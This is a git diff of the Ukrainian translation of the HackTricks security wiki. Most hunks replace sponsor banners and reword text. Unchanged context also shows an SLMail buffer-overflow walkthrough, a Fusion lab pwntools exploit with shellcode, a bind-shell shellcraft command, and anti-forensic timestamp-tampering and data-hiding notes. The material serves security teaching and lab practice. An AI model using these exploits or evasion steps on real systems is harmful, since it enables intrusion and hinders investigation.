diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index b1ced9162..6af1f70fe 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,22 +1,42 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -Якщо ви зможете зашифрувати текстовий рядок за допомогою RC4, ви зможете розшифрувати будь-який контент, зашифрований цим RC4 (використовуючи те саме пароль) просто використовуючи функцію шифрування. +Якщо ви зможете зашифрувати текстовий блок за допомогою RC4, ви зможете розшифрувати будь-який контент, зашифрований цим RC4 (використовуючи те саме пароль) просто використовуючи функцію шифрування. -Якщо ви зможете зашифрувати відомий текст, ви також зможете витягнути пароль. Додаткові посилання можна знайти на машині HTB Kryptos: +Якщо ви зможете зашифрувати відомий текст, ви також зможете витягти пароль. Додаткові посилання можна знайти на машині HTB Kryptos: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} + + + + + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/emails-vulns.md b/emails-vulns.md index 90273c7d0..afb3c3b0e 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,18 +1,19 @@ # Вразливості електронної пошти +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.**
+{% endhint %} ## diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index 2ec4949a6..7e9af12c8 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,24 +1,25 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # Level00 [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. Отримайте зсув для зміни EIP -2. Помістіть адресу shellcode в EIP +1. Отримайте зсув для модифікації EIP +2. Вставте адресу shellcode в EIP ```python from pwn import * @@ -70,16 +71,17 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа HackTricks для експертів червоної команди AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа HackTricks для експертів червоної команди GCP (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index cea179c5e..1fd5f1432 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,32 +1,33 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ``` pip3 install pwntools ``` -# Взламати asm +# Злам asm Отримати опкоди з рядка або файлу. ``` pwn asm "jmp esp" pwn asm -i ``` -**Можливі варіанти вибору:** +**Можна вибрати:** * тип виводу (raw, hex, string, elf) * контекст виводу файлу (16, 32, 64, linux, windows...) -* уникнення байтів (нові рядки, нуль, список) -* вибір енкодера для налагодження shellcode за допомогою gdb запустіть вивід +* уникнути байти (нові рядки, нуль, список) +* вибрати кодувальник для налагодження shellcode за допомогою gdb запустити вивід # **Pwn checksec** @@ -34,23 +35,23 @@ pwn asm -i ``` pwn checksec ``` -# Взламати constgrep +# Зламати constgrep -# Взламати циклічно +# Зламати циклічно Отримати шаблон ``` pwn cyclic 3000 pwn cyclic -l faad ``` -**Можливість вибору:** +**Можливі вибори:** -* Використаного алфавіту (за замовчуванням малі літери) +* Використані символи алфавіту (за замовчуванням малі літери) * Довжина унікального шаблону (за замовчуванням 4) * Контекст (16,32,64,linux,windows...) -* Взяти зміщення (-l) +* Взяти зсув (-l) -# Налагодження Pwn +# Pwn відлагодження Прикріпити GDB до процесу ``` @@ -62,15 +63,15 @@ pwn debug --process bash * За виконавчим файлом, за назвою або за контекстом pid (16,32,64,linux,windows...) * gdbscript для виконання -* sysrootpath +* Шлях до sysroot # Вимкнення nx -Вимкнення nx для виконавчого файлу +Вимкнення nx для виконуваного файлу ``` pwn disablenx ``` -# Розібрати hex opcodes +# Розібрати disasm Розібрати шістнадцяткові опкоди ``` @@ -88,11 +89,13 @@ pwn disasm ffe4 ``` pwn elfdiff ``` -# Отримати шістнадцяткове представлення +# Зламати шістнадцятковий код + +Отримати шістнадцяткове представлення ```bash pwn hex hola #Get hex of "hola" ascii ``` -# Здійснюємо атаку +# Зламати докторську Отримати шістнадцятковий дамп ``` @@ -120,17 +123,17 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` **Можна вибрати:** -* шеллкод та аргументи для шеллкоду +* shellcode та аргументи для shellcode * Вихідний файл * формат виводу -* налагодження (прикріпити dbg до шеллкоду) +* налагодження (прикріпити dbg до shellcode) * перед (пастка налагодження перед кодом) * після * уникати використання опкодів (за замовчуванням: не нуль та новий рядок) -* Запустити шеллкод +* Запустити shellcode * Колір/без кольору * перелік системних викликів -* перелік можливих шеллкодів +* перелік можливих shellcode * Згенерувати ELF як спільну бібліотеку # Шаблон Pwn @@ -139,7 +142,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` pwn template ``` -**Може вибрати:** хост, порт, користувач, пароль, шлях та тихий режим +**Можна вибрати:** хост, порт, користувач, пароль, шлях та тихий режим # Pwn unhex @@ -153,16 +156,17 @@ pwn unhex 686f6c61 ``` pwn update ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа HackTricks для експертів Red Team AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа HackTricks для експертів Red Team GCP (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index aa809dfbf..6625eb9d2 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,24 +1,25 @@ -# Взлом Windows (Базовий посібник - рівень OSCP) +# Експлуатація Windows (Базовий посібник - рівень OSCP) + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте взлом AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -## **Почніть встановлювати службу SLMail** +## **Почніть встановлення служби SLMail** ## Перезапустіть службу SLMail -Кожного разу, коли вам потрібно **перезапустити службу SLMail**, ви можете зробити це за допомогою консолі Windows: +Кожного разу, коли вам потрібно **перезапустити службу SLMail**, ви можете зробити це, використовуючи консоль Windows: ``` net start slmail ``` @@ -72,41 +73,41 @@ print "Could not connect to "+ip+":"+port ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` -Змініть буфер експлойту та встановіть шаблон і запустіть експлойт. +Змініть буфер експлойту та встановіть шаблон, а потім запустіть експлойт. Повинен виникнути новий збій, але з іншою адресою EIP: ![](<../.gitbook/assets/image (27) (1) (1).png>) -Перевірте, чи адреса була в вашому шаблоні: +Перевірте, чи адреса знаходиться у вашому шаблоні: ![](<../.gitbook/assets/image (28) (1) (1).png>) ``` /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 ``` -Схоже, **ми можемо змінити EIP в зміщенні 2606** буфера. +Виглядає так, ніби **ми можемо змінити EIP в зміщенні 2606** буфера. -Перевірте це, змінивши буфер експлойту: +Перевірте це, змінивши буфер експлоіту: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` -З цим буфером EIP, що призвело до аварії, повинно вказувати на 42424242 ("BBBB") +З цим буфером EIP, що розбився, повинен вказувати на 42424242 ("BBBB") ![](<../.gitbook/assets/image (30) (1) (1).png>) ![](<../.gitbook/assets/image (29) (1) (1).png>) -Здається, що все працює. +Здається, все працює. ## Перевірте наявність місця для Shellcode в стеку 600B повинно бути достатньо для будь-якого потужного shellcode. -Давайте змінимо буфер: +Змінимо буфер: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` -Запустіть новий експлойт та перевірте EBP та довжину корисного shellcode +запустіть новий експлойт та перевірте EBP та довжину корисного shellcode ![](<../.gitbook/assets/image (31) (1).png>) @@ -116,7 +117,7 @@ buffer = 'A'*2606 + 'BBBB' + 'C'*600 У цьому випадку у нас **від 0x0209A128 до 0x0209A2D6 = 430B.** Достатньо. -## Перевірте на наявність поганих символів +## Перевірте погані символи Знову змініть буфер: ``` @@ -170,7 +171,7 @@ buffer = 'A'*2606 + 'BBBB' + badchars ![](<../.gitbook/assets/image (35) (1).png>) -Тепер, всередині цієї пам'яті ви повинні знайти деякі байти JMP ESP, щоб це зробити, виконайте: +Тепер, всередині цієї пам'яті вам слід знайти деякі байти JMP ESP, щоб це зробити, виконайте: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case @@ -238,7 +239,7 @@ except: print "Could not connect to "+ip+":"+port ``` {% hint style="warning" %} -Існують shellcode, які **перезапишуть себе**, тому важливо завжди додавати деякі NOPs перед shellcode +Існують shellcode, які **перезаписують себе**, тому важливо завжди додавати деякі NOPs перед shellcode {% endhint %} ## Покращення shellcode @@ -247,16 +248,17 @@ print "Could not connect to "+ip+":"+port ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index dd97b0728..9e55c16ca 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,16 +1,21 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Школа взлому AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Дізнайтеся про [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} + +
+ +{% embed url="https://websec.nl/" %} # Відмітки часу @@ -18,25 +23,25 @@ Атакуючому може бути цікаво **змінити відмітки часу файлів**, щоб уникнути виявлення.\ Можна знайти відмітки часу всередині MFT в атрибутах `$STANDARD_INFORMATION` __ та __ `$FILE_NAME`. -Обидва атрибути мають 4 відмітки часу: **Модифікація**, **доступ**, **створення** та **модифікація реєстру MFT** (MACE або MACB). +Обидва атрибути мають 4 відмітки часу: **модифікація**, **доступ**, **створення** та **модифікація реєстру MFT** (MACE або MACB). **Провідник Windows** та інші інструменти показують інформацію з **`$STANDARD_INFORMATION`**. -## TimeStomp - Анти-форензичний Інструмент +## TimeStomp - Анти-форензичний інструмент Цей інструмент **змінює** інформацію про відмітки часу всередині **`$STANDARD_INFORMATION`** **але** **не** інформацію всередині **`$FILE_NAME`**. Тому можна **виявити** **підозрілу** **активність**. ## Usnjrnl -**Журнал USN** (Журнал номерів послідовності оновлень) - це функція файлової системи NTFS (система файлів Windows NT), яка відстежує зміни обсягу. Інструмент [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) дозволяє переглядати ці зміни. +**Журнал USN** (Update Sequence Number Journal) - це функція файлової системи NTFS (Windows NT), яка відстежує зміни обсягу. Інструмент [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) дозволяє переглядати ці зміни. ![](<../../.gitbook/assets/image (449).png>) -Попереднє зображення - це **вихід**, показаний **інструментом**, де можна побачити, що до файлу було внесено деякі **зміни**. +Попереднє зображення - це **вихід**, показаний **інструментом**, де можна побачити, що до файлу було внесено **зміни**. ## $LogFile -**Усі зміни метаданих в файловій системі реєструються** в процесі, відомому як [логування перед записом](https://en.wikipedia.org/wiki/Write-ahead_logging). Зареєстровані метадані зберігаються в файлі з назвою `**$LogFile**`, розташованому в кореневому каталозі файлової системи NTFS. Інструменти, такі як [LogFileParser](https://github.com/jschicht/LogFileParser), можуть використовуватися для розбору цього файлу та ідентифікації змін. +**Усі зміни метаданих файлової системи реєструються** в процесі, відомому як [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Зареєстровані метадані зберігаються в файлі під назвою `**$LogFile**`, розташованому в кореневому каталозі файлової системи NTFS. Інструменти, такі як [LogFileParser](https://github.com/jschicht/LogFileParser), можуть використовуватися для аналізу цього файлу та ідентифікації змін. ![](<../../.gitbook/assets/image (450).png>) @@ -48,7 +53,7 @@ * CTIME: Час створення файлу * ATIME: Час модифікації файлу -* MTIME: Час модифікації реєстру MFT файлу +* MTIME: Модифікація реєстру MFT файлу * RTIME: Час доступу до файлу ## Порівняння `$STANDARD_INFORMATION` та `$FILE_NAME` @@ -59,49 +64,49 @@ Відмітки часу **NTFS** мають **точність** **100 наносекунд**. Тому знаходження файлів з відмітками часу, наприклад, 2010-10-10 10:10:**00.000:0000, є дуже підозрілим**. -## SetMace - Анти-форензичний Інструмент +## SetMace - Анти-форензичний інструмент -Цей інструмент може змінювати обидва атрибути `$STARNDAR_INFORMATION` та `$FILE_NAME`. Однак починаючи з Windows Vista, для зміни цієї інформації потрібна жива ОС. +Цей інструмент може змінювати обидва атрибути `$STARNDAR_INFORMATION` та `$FILE_NAME`. Однак починаючи з Windows Vista, для зміни цієї інформації потрібна робоча ОС. -# Приховування Даних +# Приховування даних -NTFS використовує кластер та мінімальний розмір інформації. Це означає, що якщо файл займає кластер та півтора, **залишкова половина ніколи не буде використана**, поки файл не буде видалено. Тому можна **приховати 